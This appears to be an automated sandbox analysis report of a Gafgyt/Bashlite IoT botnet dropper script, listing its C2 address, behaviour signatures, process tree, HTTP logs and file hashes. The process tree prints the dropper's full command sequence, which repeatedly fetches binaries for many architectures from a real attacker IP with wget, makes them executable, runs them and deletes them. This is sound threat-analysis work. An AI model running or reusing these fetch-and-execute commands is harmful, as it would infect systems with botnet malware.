Analysis

  • max time kernel
    29s
  • max time network
    60s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240508-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2004-amd64-20240508-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
  • submitted
    28/09/2024, 07:55 UTC

General

  • Target

    sex.sh

  • Size

    1KB

  • MD5

    884dc57dd0892038d53a2d4b017504df

  • SHA1

    52ab9780591ee9718ce6188a9edafc1afa05dcdf

  • SHA256

    d347e32185478f56ce1c96e1e5dc3ad80ffdcf623036ca6750c60c6183a5c779

  • SHA512

    25e1afb67512005fecdf47712dfc1f0c74ecb221ed0f3904ff47f3ef30948334e31426003f6590c580024f758c7ab8576412a280b5f5ce3f787b6208037db3ca

Malware Config

Extracted

Family

gafgyt

C2

205.185.127.244:23

Signatures

  • Detected Gafgyt variant 11 IoCs
  • Gafgyt/Bashlite

    IoT botnet with numerous variants first seen in 2014.

  • File and Directory Permissions Modification 1 TTPs 13 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 11 IoCs
  • Modifies Watchdog functionality 1 TTPs 6 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Changes its process name 3 IoCs
  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 11 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/sex.sh
    /tmp/sex.sh
    1⤵
      PID:1396
      • /usr/bin/wget
        wget http://205.185.127.244/mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1397
      • /usr/bin/chmod
        chmod +x mips
        2⤵
        • File and Directory Permissions Modification
        PID:1443
      • /tmp/mips
        ./mips
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:1444
      • /usr/bin/rm
        rm -rf mips
        2⤵
        • System Network Configuration Discovery
        PID:1446
      • /usr/bin/wget
        wget http://205.185.127.244/mipsel
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1447
      • /usr/bin/chmod
        chmod +x mipsel
        2⤵
        • File and Directory Permissions Modification
        PID:1448
      • /tmp/mipsel
        ./mipsel
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:1449
      • /usr/bin/rm
        rm -rf mipsel
        2⤵
        • System Network Configuration Discovery
        PID:1451
      • /usr/bin/wget
        wget http://205.185.127.244/sh4
        2⤵
        • Writes file to tmp directory
        PID:1452
      • /usr/bin/chmod
        chmod +x sh4
        2⤵
        • File and Directory Permissions Modification
        PID:1453
      • /tmp/sh4
        ./sh4
        2⤵
        • Executes dropped EXE
        PID:1454
      • /usr/bin/rm
        rm -rf sh4
        2⤵
          PID:1456
        • /usr/bin/wget
          wget http://205.185.127.244/x86
          2⤵
          • Writes file to tmp directory
          PID:1457
        • /usr/bin/chmod
          chmod +x x86
          2⤵
          • File and Directory Permissions Modification
          PID:1458
        • /tmp/x86
          ./x86
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Changes its process name
          PID:1459
        • /usr/bin/rm
          rm -rf x86
          2⤵
            PID:1462
          • /usr/bin/wget
            wget http://205.185.127.244/arm61
            2⤵
            • Writes file to tmp directory
            PID:1464
          • /usr/bin/chmod
            chmod +x arm61
            2⤵
            • File and Directory Permissions Modification
            PID:1466
          • /tmp/arm61
            ./arm61
            2⤵
            • Executes dropped EXE
            PID:1467
          • /usr/bin/rm
            rm -rf arm61
            2⤵
              PID:1469
            • /usr/bin/wget
              wget http://205.185.127.244/i686
              2⤵
              • Writes file to tmp directory
              PID:1470
            • /usr/bin/chmod
              chmod +x i686
              2⤵
              • File and Directory Permissions Modification
              PID:1471
            • /tmp/i686
              ./i686
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Changes its process name
              PID:1472
            • /usr/bin/rm
              rm -rf i686
              2⤵
                PID:1475
              • /usr/bin/wget
                wget http://205.185.127.244/ppc
                2⤵
                • Writes file to tmp directory
                PID:1477
              • /usr/bin/chmod
                chmod +x ppc
                2⤵
                • File and Directory Permissions Modification
                PID:1496
              • /tmp/ppc
                ./ppc
                2⤵
                • Executes dropped EXE
                PID:1497
              • /usr/bin/rm
                rm -rf ppc
                2⤵
                  PID:1499
                • /usr/bin/wget
                  wget http://205.185.127.244/586
                  2⤵
                  • Writes file to tmp directory
                  PID:1500
                • /usr/bin/chmod
                  chmod +x 586
                  2⤵
                  • File and Directory Permissions Modification
                  PID:1501
                • /tmp/586
                  ./586
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Changes its process name
                  PID:1502
                • /usr/bin/rm
                  rm -rf 586
                  2⤵
                    PID:1505
                  • /usr/bin/wget
                    wget http://205.185.127.244/m68k
                    2⤵
                    • Writes file to tmp directory
                    PID:1507
                  • /usr/bin/chmod
                    chmod +x m68k
                    2⤵
                    • File and Directory Permissions Modification
                    PID:1509
                  • /tmp/m68k
                    ./m68k
                    2⤵
                    • Executes dropped EXE
                    PID:1510
                  • /usr/bin/rm
                    rm -rf m68k
                    2⤵
                      PID:1512
                    • /usr/bin/wget
                      wget http://205.185.127.244/dc
                      2⤵
                        PID:1513
                      • /usr/bin/chmod
                        chmod +x dc
                        2⤵
                        • File and Directory Permissions Modification
                        PID:1514
                      • /tmp/dc
                        ./dc
                        2⤵
                          PID:1515
                        • /usr/bin/rm
                          rm -rf dc
                          2⤵
                            PID:1516
                          • /usr/bin/wget
                            wget http://205.185.127.244/dss
                            2⤵
                            • Writes file to tmp directory
                            PID:1517
                          • /usr/bin/chmod
                            chmod +x dss
                            2⤵
                            • File and Directory Permissions Modification
                            PID:1518
                          • /tmp/dss
                            ./dss
                            2⤵
                            • Executes dropped EXE
                            PID:1519
                          • /usr/bin/rm
                            rm -rf dss
                            2⤵
                              PID:1521
                            • /usr/bin/wget
                              wget http://205.185.127.244/co
                              2⤵
                              • Writes file to tmp directory
                              PID:1522
                            • /usr/bin/chmod
                              chmod +x co
                              2⤵
                              • File and Directory Permissions Modification
                              PID:1523
                            • /tmp/co
                              ./co
                              2⤵
                              • Executes dropped EXE
                              PID:1524
                            • /usr/bin/rm
                              rm -rf co
                              2⤵
                                PID:1526
                              • /usr/bin/wget
                                wget http://205.185.127.244/scar
                                2⤵
                                  PID:1527
                                • /usr/bin/chmod
                                  chmod +x scar
                                  2⤵
                                  • File and Directory Permissions Modification
                                  PID:1528
                                • /tmp/scar
                                  ./scar
                                  2⤵
                                    PID:1529
                                  • /usr/bin/rm
                                    rm -rf scar
                                    2⤵
                                      PID:1530

                                  Network

                                  • flag-us
                                    GET
                                    http://205.185.127.244/mips
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /mips HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:55:37 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:37 GMT
                                    ETag: "2c264-621a967fb0e2a"
                                    Accept-Ranges: bytes
                                    Content-Length: 180836
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    DNS
                                    connectivity-check.ubuntu.com
                                    Remote address:
                                    1.1.1.1:53
                                    Request
                                    connectivity-check.ubuntu.com
                                    IN AAAA
                                    Response
                                    connectivity-check.ubuntu.com
                                    IN AAAA
                                    2620:2d:4000:1::98
                                    connectivity-check.ubuntu.com
                                    IN AAAA
                                    2620:2d:4000:1::23
                                    connectivity-check.ubuntu.com
                                    IN AAAA
                                    2620:2d:4002:1::197
                                    connectivity-check.ubuntu.com
                                    IN AAAA
                                    2620:2d:4000:1::2a
                                    connectivity-check.ubuntu.com
                                    IN AAAA
                                    2620:2d:4002:1::196
                                    connectivity-check.ubuntu.com
                                    IN AAAA
                                    2620:2d:4000:1::96
                                    connectivity-check.ubuntu.com
                                    IN AAAA
                                    2001:67c:1562::23
                                    connectivity-check.ubuntu.com
                                    IN AAAA
                                    2620:2d:4002:1::198
                                    connectivity-check.ubuntu.com
                                    IN AAAA
                                    2001:67c:1562::24
                                    connectivity-check.ubuntu.com
                                    IN AAAA
                                    2620:2d:4000:1::2b
                                    connectivity-check.ubuntu.com
                                    IN AAAA
                                    2620:2d:4000:1::97
                                    connectivity-check.ubuntu.com
                                    IN AAAA
                                    2620:2d:4000:1::22
                                  • flag-us
                                    GET
                                    http://205.185.127.244/mipsel
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /mipsel HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:55:41 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:37 GMT
                                    ETag: "2c264-621a967fb21b2"
                                    Accept-Ranges: bytes
                                    Content-Length: 180836
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/sh4
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /sh4 HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:55:47 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:37 GMT
                                    ETag: "1eeb7-621a967fb44db"
                                    Accept-Ranges: bytes
                                    Content-Length: 126647
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/x86
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /x86 HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:55:58 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:37 GMT
                                    ETag: "1fe71-621a967fb641b"
                                    Accept-Ranges: bytes
                                    Content-Length: 130673
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/arm61
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /arm61 HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:56:01 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:37 GMT
                                    ETag: "2b951-621a967fb7f73"
                                    Accept-Ranges: bytes
                                    Content-Length: 178513
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/i686
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /i686 HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:56:03 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:37 GMT
                                    ETag: "1bc7f-621a967fb96e3"
                                    Accept-Ranges: bytes
                                    Content-Length: 113791
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/ppc
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /ppc HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:56:04 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:38 GMT
                                    ETag: "202e8-621a967fbae53"
                                    Accept-Ranges: bytes
                                    Content-Length: 131816
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/586
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /586 HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:56:06 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:38 GMT
                                    ETag: "1ac97-621a967fbc1db"
                                    Accept-Ranges: bytes
                                    Content-Length: 109719
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/m68k
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /m68k HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:56:07 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:38 GMT
                                    ETag: "205ff-621a967fbd94b"
                                    Accept-Ranges: bytes
                                    Content-Length: 132607
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/dc
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /dc HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sat, 28 Sep 2024 07:56:09 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Content-Length: 200
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=iso-8859-1
                                  • flag-us
                                    GET
                                    http://205.185.127.244/dss
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /dss HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:56:09 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:38 GMT
                                    ETag: "21e0b-621a967fc082c"
                                    Accept-Ranges: bytes
                                    Content-Length: 138763
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/co
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /co HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 200 OK
                                    Date: Sat, 28 Sep 2024 07:56:11 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Last-Modified: Mon, 09 Sep 2024 05:55:38 GMT
                                    ETag: "2b951-621a967fc1f9c"
                                    Accept-Ranges: bytes
                                    Content-Length: 178513
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                  • flag-us
                                    GET
                                    http://205.185.127.244/scar
                                    Remote address:
                                    205.185.127.244:80
                                    Request
                                    GET /scar HTTP/1.1
                                    User-Agent: Wget/1.20.3 (linux-gnu)
                                    Accept: */*
                                    Accept-Encoding: identity
                                    Host: 205.185.127.244
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sat, 28 Sep 2024 07:56:13 GMT
                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                    Content-Length: 202
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: text/html; charset=iso-8859-1
                                  • 205.185.127.244:80
                                    http://205.185.127.244/mips
                                    http
                                    2.6kB
                                    188.3kB
                                    43
                                    138

                                    HTTP Request

                                    GET http://205.185.127.244/mips

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/mipsel
                                    http
                                    4.6kB
                                    189.8kB
                                    84
                                    140

                                    HTTP Request

                                    GET http://205.185.127.244/mipsel

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/sh4
                                    http
                                    3.3kB
                                    133.5kB
                                    51
                                    100

                                    HTTP Request

                                    GET http://205.185.127.244/sh4

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/x86
                                    http
                                    2.6kB
                                    136.2kB
                                    47
                                    101

                                    HTTP Request

                                    GET http://205.185.127.244/x86

                                    HTTP Response

                                    200
                                  • 205.185.127.244:23
                                    363 B
                                    221 B
                                    5
                                    4
                                  • 205.185.127.244:80
                                    http://205.185.127.244/arm61
                                    http
                                    3.6kB
                                    185.9kB
                                    67
                                    136

                                    HTTP Request

                                    GET http://205.185.127.244/arm61

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/i686
                                    http
                                    2.9kB
                                    118.7kB
                                    53
                                    88

                                    HTTP Request

                                    GET http://205.185.127.244/i686

                                    HTTP Response

                                    200
                                  • 205.185.127.244:23
                                    254 B
                                    112 B
                                    3
                                    2
                                  • 205.185.127.244:80
                                    http://205.185.127.244/ppc
                                    http
                                    3.3kB
                                    137.4kB
                                    61
                                    102

                                    HTTP Request

                                    GET http://205.185.127.244/ppc

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/586
                                    http
                                    2.6kB
                                    114.4kB
                                    47
                                    85

                                    HTTP Request

                                    GET http://205.185.127.244/586

                                    HTTP Response

                                    200
                                  • 205.185.127.244:23
                                    254 B
                                    112 B
                                    3
                                    2
                                  • 205.185.127.244:80
                                    http://205.185.127.244/m68k
                                    http
                                    2.6kB
                                    138.2kB
                                    48
                                    102

                                    HTTP Request

                                    GET http://205.185.127.244/m68k

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/dc
                                    http
                                    464 B
                                    663 B
                                    6
                                    4

                                    HTTP Request

                                    GET http://205.185.127.244/dc

                                    HTTP Response

                                    404
                                  • 205.185.127.244:80
                                    http://205.185.127.244/dss
                                    http
                                    3.3kB
                                    144.6kB
                                    60
                                    107

                                    HTTP Request

                                    GET http://205.185.127.244/dss

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/co
                                    http
                                    3.5kB
                                    185.9kB
                                    64
                                    136

                                    HTTP Request

                                    GET http://205.185.127.244/co

                                    HTTP Response

                                    200
                                  • 205.185.127.244:80
                                    http://205.185.127.244/scar
                                    http
                                    466 B
                                    665 B
                                    6
                                    4

                                    HTTP Request

                                    GET http://205.185.127.244/scar

                                    HTTP Response

                                    404
                                  • 224.0.0.251:5353
                                    73 B
                                    1
                                  • 1.1.1.1:53
                                    connectivity-check.ubuntu.com
                                    dns
                                    86 B
                                    422 B
                                    1
                                    1

                                    DNS Request

                                    connectivity-check.ubuntu.com

                                    DNS Response

                                    2620:2d:4000:1::98
                                    2620:2d:4000:1::23
                                    2620:2d:4002:1::197
                                    2620:2d:4000:1::2a
                                    2620:2d:4002:1::196
                                    2620:2d:4000:1::96
                                    2001:67c:1562::23
                                    2620:2d:4002:1::198
                                    2001:67c:1562::24
                                    2620:2d:4000:1::2b
                                    2620:2d:4000:1::97
                                    2620:2d:4000:1::22

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • /tmp/586

                                    Filesize

                                    107KB

                                    MD5

                                    878511883ecf938a9b30e0a5eebb1b78

                                    SHA1

                                    6f4192c09680a8cdec1c33fec77e40a96faeee15

                                    SHA256

                                    777ff84d65d53fb8da3f25c4c303cb6f6505ee534e8bdbd936c1f9e60e70a533

                                    SHA512

                                    8ea3f989940b431a6b994374fc322a0eb7933fe6791e947a573ad3e7d26f6a4ee8c72ae4d79e6d23be5f152df4e29934bb7e623a7530ac2752f4c6e3cf0181a4

                                  • /tmp/arm61

                                    Filesize

                                    174KB

                                    MD5

                                    00c59b56e0ef93ffa2eacb7ffc355bc6

                                    SHA1

                                    e9f1a9fa3f2d7e9b8d40129dea37e82746609cea

                                    SHA256

                                    e0fa297f5c991e85f42412776055dda158fb18d7d69ff51e2b5430291f1746c7

                                    SHA512

                                    063a3293125b6981bafe1409bbf2b06ce21496a18496a39a4837f1bdad73e8dfb590118a1eab50e50504ef884a389e516090f485f7381c68f3233d290cdbadcf

                                  • /tmp/co

                                    Filesize

                                    174KB

                                    MD5

                                    8d324a6048da1a123cef9a1465400ece

                                    SHA1

                                    dca6c1f2874c31de3b3b684ef99be2d82450d3bf

                                    SHA256

                                    4cdd14a882e285d404b0da6a70470dfd5553a04352e30a6f7418c689f8f8916a

                                    SHA512

                                    6ba9293bd1d81164d38cd46759aee0ff912b9354c71eb4a639695ed0c0829f4f2a846845647a4c72b295cac8fe2780f107336ea12ba10623df8f1fa4f3ca1f0e

                                  • /tmp/dss

                                    Filesize

                                    135KB

                                    MD5

                                    70445303ca15c2739d0c1d103fc77783

                                    SHA1

                                    97bd19478d17211679b66692a7945ed38c9924e3

                                    SHA256

                                    51bbbe5154ebaf34aceb846a0823dbd88cae1175cd90d6e741b89ad3fe16a5e0

                                    SHA512

                                    a3daa674f970158f76cbb83a10704e880d313d3e2615d486395f0c8339017c2fc1d98084ebe82bd3a6b5e898032e976c4440905c764eb0c048b3983f4b956b77

                                  • /tmp/i686

                                    Filesize

                                    111KB

                                    MD5

                                    9528d0e8ca08dae17e7e19ef7d13e035

                                    SHA1

                                    5d1ff7764e03718af5ebe432c9b8d0d2e1d057ee

                                    SHA256

                                    53c2bfcfa15435d366b80b96946fe5cff049453b086cd255faf0968d55605f1e

                                    SHA512

                                    72d6cd79bf99d095ee7009c3ff6569d7fbc0b950207aac061c4a289f9e89027519e1d7fa25f778a3131c0f57743ccdec5c30d4ebb8eabaa48ed61ceb18c4030e

                                  • /tmp/m68k

                                    Filesize

                                    129KB

                                    MD5

                                    5f4fef5c575e8b3b11d8475dd4de719a

                                    SHA1

                                    273104250032ebdc02e19b05bcf2b5b682e27368

                                    SHA256

                                    b909016b579dfc65db56aac511f68f0ed62ef87b14c4819278ad9dc67cf68338

                                    SHA512

                                    7103b1af22a821297fc1aab82e128936e306059ed055d979e5af418cc8e21ead7f2d28988816b8709be733a36eaccaca0a5d3f0fd17983400cb5e3daeb907e89

                                  • /tmp/mips

                                    Filesize

                                    176KB

                                    MD5

                                    24e07a16008a42f0a8dceb166b4b44cd

                                    SHA1

                                    87f80fc2998304bc8735479faa75f509a6d5db13

                                    SHA256

                                    c4d4bfc3fa6e216baccce64fe187d70519f11aa8ad33573cfdf1c416bbd0ad6f

                                    SHA512

                                    b75a61fc9584e124dbc98556e30166e379dc01ce64312a48906d8e4aed406127aeea1da5f8183e10fe0468908863f7467ac58e71f482c119300836c7c419dab5

                                  • /tmp/mipsel

                                    Filesize

                                    176KB

                                    MD5

                                    ac28a3dfa3ed9b815a8021a362b06607

                                    SHA1

                                    93455b3775f586e230d8879489f9a6062de70677

                                    SHA256

                                    3d9924dddeca5e712bd22e28453437b61eb95c5319e7535737a0bd7a128f30a5

                                    SHA512

                                    94c3aae6a3e945aac0beff504c76f454a5f2b78b88d4cd2364cb0f5608dc25183d37bf0338d4fc2966616e95cbe7ef03f34dfb910dd688ae536d9f5a66f1516e

                                  • /tmp/ppc

                                    Filesize

                                    128KB

                                    MD5

                                    184c7d44649ab256bd5705724bbec6a1

                                    SHA1

                                    baa0a75bd81f5985eb42ad0bdc282405b66af67d

                                    SHA256

                                    3a6f6b23c30602cfd2328e7a6972fcc29423e4ed67a1b854d108b7711992ec58

                                    SHA512

                                    ec1cd34debb06ce5c1571582f26b433ee34c7959fa1d1af0e1e6a0f9834f3d277916e8128d1b73ad569df89e7576b3b9a1a112dd08f10ddee00e30e821ffaa43

                                  • /tmp/sh4

                                    Filesize

                                    123KB

                                    MD5

                                    5ec3c0e18b6fbc6e37bd611e2df8f9a4

                                    SHA1

                                    de10e2b7ce11ffa0bc0fcca82a489a3e6efc160d

                                    SHA256

                                    9b1ca4aa272007f3ae1a80932a690cd1749ab6f8f7980de0f2e5cd326573c4c6

                                    SHA512

                                    76f484543e43cfb33ff449439a64ae08578a7c8142393eed0219f642d7e9401ecf7efe093765be45f1c767d970cc0d280ba53264eb2a6eb7771a7055765e8b20

                                  • /tmp/x86

                                    Filesize

                                    127KB

                                    MD5

                                    678363120cd2661f040670b90f211243

                                    SHA1

                                    57d75e1c42243d08eb78623e6cdc6b066994a7ee

                                    SHA256

                                    cd39c6c637c039bcedc5b906e8c0e602f73c841947b429efc88ec4511d95a36a

                                    SHA512

                                    5a2b440135caa5656deb70f7d6274f8bc570e31c6aac4b6aac8375962db512b885afc6223a9767fc0ff7f29dc5377efa441277cb356dba1e3b5716a57f38ca55

                                  We care about your privacy.

                                  This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.